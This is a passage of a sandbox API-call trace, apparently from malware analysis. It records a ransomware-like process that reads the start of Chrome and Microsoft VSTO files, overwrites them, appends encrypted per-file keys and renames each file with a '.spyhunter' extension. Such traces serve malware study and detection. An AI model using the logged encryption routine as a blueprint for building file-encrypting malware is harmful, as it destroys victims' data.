(x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_watcher.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_watcher.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0177.089] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_watcher.dll") returned 85 [0177.089] StrStrW (lpFirst="chrome_watcher.dll", lpSrch=".txt") returned 0x0 [0177.089] GetProcessHeap () returned 0x2c0000 [0177.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0177.089] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce34c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce34c*=0x2800, lpOverlapped=0x0) returned 1 [0177.111] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.111] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce34c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce34c*=0x2800, lpOverlapped=0x0) returned 1 [0177.111] GetProcessHeap () returned 0x2c0000 [0177.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0177.111] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.111] WriteFile (in: hFile=0x178, lpBuffer=0x25ce38c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce34c, lpOverlapped=0x0 | out: lpBuffer=0x25ce38c*, lpNumberOfBytesWritten=0x25ce34c*=0x4, lpOverlapped=0x0) returned 1 [0177.113] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce34c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce34c*=0x30, lpOverlapped=0x0) returned 1 [0177.113] CloseHandle (hObject=0x178) returned 1 [0177.279] GetProcessHeap () returned 0x2c0000 [0177.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.279] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_watcher.dll.spyhunter") returned 95 [0177.279] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_watcher.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_watcher.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_watcher.dll.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_watcher.dll.spyhunter")) returned 1 [0177.281] GetProcessHeap () returned 0x2c0000 [0177.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.281] GetProcessHeap () returned 0x2c0000 [0177.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0177.281] GetProcessHeap () returned 0x2c0000 [0177.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec9de0 | out: hHeap=0x2c0000) returned 1 [0177.281] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce388 | out: pbBuffer=0x25ce388) returned 1 [0177.281] GetProcessHeap () returned 0x2c0000 [0177.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0177.282] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce380*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce380*=0x30) returned 1 [0177.282] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_200_percent.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_200_percent.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0177.283] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_200_percent.pak") returned 89 [0177.283] StrStrW (lpFirst="chrome_200_percent.pak", lpSrch=".txt") returned 0x0 [0177.283] GetProcessHeap () returned 0x2c0000 [0177.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0177.283] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce344, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce344*=0x2800, lpOverlapped=0x0) returned 1 [0177.335] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.335] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce344, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce344*=0x2800, lpOverlapped=0x0) returned 1 [0177.335] GetProcessHeap () returned 0x2c0000 [0177.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0177.335] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.335] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce384*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce344, lpOverlapped=0x0 | out: lpBuffer=0x25ce384*, lpNumberOfBytesWritten=0x25ce344*=0x4, lpOverlapped=0x0) returned 1 [0177.414] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce344, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce344*=0x30, lpOverlapped=0x0) returned 1 [0177.414] CloseHandle (hObject=0xb0) returned 1 [0177.414] GetProcessHeap () returned 0x2c0000 [0177.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.414] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_200_percent.pak.spyhunter") returned 99 [0177.414] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_200_percent.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_200_percent.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_200_percent.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_200_percent.pak.spyhunter")) returned 1 [0177.415] GetProcessHeap () returned 0x2c0000 [0177.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.415] GetProcessHeap () returned 0x2c0000 [0177.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0177.416] GetProcessHeap () returned 0x2c0000 [0177.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5e1c0 | out: hHeap=0x2c0000) returned 1 [0177.416] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce388 | out: pbBuffer=0x25ce388) returned 1 [0177.416] GetProcessHeap () returned 0x2c0000 [0177.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0177.416] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce380*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce380*=0x30) returned 1 [0177.416] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0177.417] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll") returned 77 [0177.417] StrStrW (lpFirst="chrome.dll", lpSrch=".txt") returned 0x0 [0177.417] GetProcessHeap () returned 0x2c0000 [0177.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0177.417] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce344, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce344*=0x2800, lpOverlapped=0x0) returned 1 [0177.467] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.467] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce344, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce344*=0x2800, lpOverlapped=0x0) returned 1 [0177.468] GetProcessHeap () returned 0x2c0000 [0177.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0177.468] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.468] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce384*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce344, lpOverlapped=0x0 | out: lpBuffer=0x25ce384*, lpNumberOfBytesWritten=0x25ce344*=0x4, lpOverlapped=0x0) returned 1 [0177.564] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce344, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce344*=0x30, lpOverlapped=0x0) returned 1 [0177.564] CloseHandle (hObject=0xb0) returned 1 [0177.564] GetProcessHeap () returned 0x2c0000 [0177.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.565] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll.spyhunter") returned 87 [0177.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.dll.spyhunter")) returned 1 [0177.566] GetProcessHeap () returned 0x2c0000 [0177.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.566] GetProcessHeap () returned 0x2c0000 [0177.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0177.566] GetProcessHeap () returned 0x2c0000 [0177.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eea470 | out: hHeap=0x2c0000) returned 1 [0177.566] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce380 | out: pbBuffer=0x25ce380) returned 1 [0177.566] GetProcessHeap () returned 0x2c0000 [0177.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0177.566] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce378*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce378*=0x30) returned 1 [0177.566] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0177.569] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb") returned 75 [0177.569] StrStrW (lpFirst="vstoee100.tlb", lpSrch=".txt") returned 0x0 [0177.569] GetProcessHeap () returned 0x2c0000 [0177.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0177.569] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce33c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce33c*=0x2800, lpOverlapped=0x0) returned 1 [0177.597] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.597] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce33c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce33c*=0x2800, lpOverlapped=0x0) returned 1 [0177.597] GetProcessHeap () returned 0x2c0000 [0177.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0177.597] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.597] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce37c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce33c, lpOverlapped=0x0 | out: lpBuffer=0x25ce37c*, lpNumberOfBytesWritten=0x25ce33c*=0x4, lpOverlapped=0x0) returned 1 [0177.698] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce33c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce33c*=0x30, lpOverlapped=0x0) returned 1 [0177.698] CloseHandle (hObject=0xb0) returned 1 [0177.698] GetProcessHeap () returned 0x2c0000 [0177.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.698] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.spyhunter") returned 85 [0177.699] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee100.tlb.spyhunter")) returned 1 [0177.700] GetProcessHeap () returned 0x2c0000 [0177.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.700] GetProcessHeap () returned 0x2c0000 [0177.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0177.700] GetProcessHeap () returned 0x2c0000 [0177.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4470 | out: hHeap=0x2c0000) returned 1 [0177.700] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce380 | out: pbBuffer=0x25ce380) returned 1 [0177.700] GetProcessHeap () returned 0x2c0000 [0177.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0177.701] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce378*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce378*=0x30) returned 1 [0177.701] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0177.702] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 84 [0177.702] StrStrW (lpFirst="VSTOInstaller.exe", lpSrch=".txt") returned 0x0 [0177.702] GetProcessHeap () returned 0x2c0000 [0177.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0177.702] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce33c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce33c*=0x2800, lpOverlapped=0x0) returned 1 [0177.750] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.750] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce33c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce33c*=0x2800, lpOverlapped=0x0) returned 1 [0177.765] GetProcessHeap () returned 0x2c0000 [0177.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0177.765] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.765] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce37c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce33c, lpOverlapped=0x0 | out: lpBuffer=0x25ce37c*, lpNumberOfBytesWritten=0x25ce33c*=0x4, lpOverlapped=0x0) returned 1 [0177.775] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce33c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce33c*=0x30, lpOverlapped=0x0) returned 1 [0177.776] CloseHandle (hObject=0xb0) returned 1 [0177.776] GetProcessHeap () returned 0x2c0000 [0177.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.776] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe.spyhunter") returned 94 [0177.776] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe.spyhunter")) returned 1 [0177.777] GetProcessHeap () returned 0x2c0000 [0177.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.777] GetProcessHeap () returned 0x2c0000 [0177.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0177.777] GetProcessHeap () returned 0x2c0000 [0177.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4c638 | out: hHeap=0x2c0000) returned 1 [0177.777] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce378 | out: pbBuffer=0x25ce378) returned 1 [0177.777] GetProcessHeap () returned 0x2c0000 [0177.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0177.778] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce370*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce370*=0x30) returned 1 [0177.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.office.contract.v10.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0177.778] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll") returned 141 [0177.778] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll", lpSrch=".txt") returned 0x0 [0177.778] GetProcessHeap () returned 0x2c0000 [0177.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0177.779] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce334, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce334*=0x2800, lpOverlapped=0x0) returned 1 [0177.849] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.849] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce334, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce334*=0x2800, lpOverlapped=0x0) returned 1 [0177.849] GetProcessHeap () returned 0x2c0000 [0177.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0177.849] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.849] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce374*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce334, lpOverlapped=0x0 | out: lpBuffer=0x25ce374*, lpNumberOfBytesWritten=0x25ce334*=0x4, lpOverlapped=0x0) returned 1 [0177.850] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce334, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce334*=0x30, lpOverlapped=0x0) returned 1 [0177.850] CloseHandle (hObject=0xb0) returned 1 [0177.851] GetProcessHeap () returned 0x2c0000 [0177.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.851] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll.spyhunter") returned 151 [0177.851] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.office.contract.v10.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.office.contract.v10.0.dll.spyhunter")) returned 1 [0177.852] GetProcessHeap () returned 0x2c0000 [0177.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.852] GetProcessHeap () returned 0x2c0000 [0177.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0177.852] GetProcessHeap () returned 0x2c0000 [0177.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0a180 | out: hHeap=0x2c0000) returned 1 [0177.852] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce378 | out: pbBuffer=0x25ce378) returned 1 [0177.852] GetProcessHeap () returned 0x2c0000 [0177.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0177.852] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce370*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce370*=0x30) returned 1 [0177.852] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.office.tools.v9.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0177.854] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.Office.Tools.v9.0.dll") returned 119 [0177.854] StrStrW (lpFirst="Microsoft.Office.Tools.v9.0.dll", lpSrch=".txt") returned 0x0 [0177.854] GetProcessHeap () returned 0x2c0000 [0177.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 